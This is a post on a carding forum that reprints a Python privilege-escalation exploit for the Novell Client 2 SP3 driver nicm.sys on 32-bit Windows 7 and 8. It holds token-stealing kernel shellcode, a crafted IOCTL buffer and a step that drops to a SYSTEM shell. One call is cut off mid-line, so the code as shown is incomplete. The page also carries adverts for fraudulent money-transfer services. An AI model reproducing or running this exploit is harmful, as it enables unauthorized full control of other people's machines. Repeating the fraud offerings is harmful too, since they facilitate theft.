We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Novell Client 2 SP3 Privilege Escalation Exploit

#1
Code:
# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather t
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: https://www.exploit-db.com/exploits/26452/
from ctypes import *
import sys,struct,os
from optparse import OptionParser
kernel32 = windll.kernel32
ntdll    = windll.ntdll
if __name__ == '__main__':
     usage =  "%prog -o <target>"
     parser = OptionParser(usage=usage)
     parser.add_option("-o", type="string",
                  action="store", dest="target_os",
                  help="Available target operating systems: WIN7, WIN8")
     (options, args) = parser.parse_args()
     OS = options.target_os
     if not OS or OS.upper() not in ['WIN7','WIN8']:
           parser.print_help()
           sys.exit()
     OS = OS.upper()
     if OS == "WIN7":
                _KPROCESS = "\x50" # Offset for Win7
                _TOKEN    = "\xf8" # Offset for Win7
                _UPID     = "\xb4" # Offset for Win7
                _APLINKS  = "\xb8" # Offset for Win7
                steal_token =  "\x52"                                 +\
                 "\x53"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\xc8"                             +\
                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\
                 "\x89\x1d\x00\x09\x02\x00"             +\
                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                 "\x75\xe8"                             +\
                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\xc1"                             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5b"                                 +\
                 "\x5a"                                 +\
                 "\xc2\x08"
                sc = steal_token
     else:
                _KPROCESS = "\x80" # Offset for Win8
                _TOKEN    = "\xEC" # Offset for Win8
                _UPID     = "\xB4" # Offset for Win8
                _APLINKS  = "\xB8" # Offset for Win8
                steal_token =  "\x52"                                 +\
                 "\x53"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\
                 "\x8b\xc8"                             +\
                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                 "\x75\xe8"                             +\
                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\xc1"                             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5b"                                 +\
                 "\x5a"                                 +\
                 "\xc2\x08"
                sc = steal_token
     kernel_sc = "\x14\x00\x0d\x0d"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x18\x00\x0d\x0d"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x41\x41\x41\x41"
     kernel_sc+= "\x28\x00\x0d\x0d"
     kernel_sc+= sc
     print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
     print "[>] Finding the driver."
     GENERIC_READ = 0x80000000
     GENERIC_WRITE = 0x40000000
     OPEN_EXISTING = 0x3
     DEVICE = '\\\\.\\nicm'
     device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
     EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
     retn = c_ulong()
     inut_buffer = 0x0d0d0000
     inut_size = 0x14
     output_buffer = 0x0
     output_size = 0x0
     baseadd    = c_int(0x0d0d0000)
     MEMRES     = (0x1000 | 0x2000)
     PAGEEXE    = 0x00000040
     Zero_Bits   = c_int(0)
     RegionSize = c_int(0x1000)
     write    = c_int(0)
     print "[>] Allocating memory for our shellcode."
     dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
     print "[>] Writing the shellcode."
     kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))
     if device_handler:
        print "[>] Sending IOCTL to the driver."
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size,
     print "[>] Dropping to a SYSTEM shell."
     os.system("cmd.exe /K cd C:\\windows\\system32")
# 7626D28420E836AE   1337day.com [2013-07-30]   A3127553E7A6F16D #
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted WesternUnion / MoneyGram / Bank - Transferring -WorldWide [ MTCN in 3 hours ]




Forum Jump: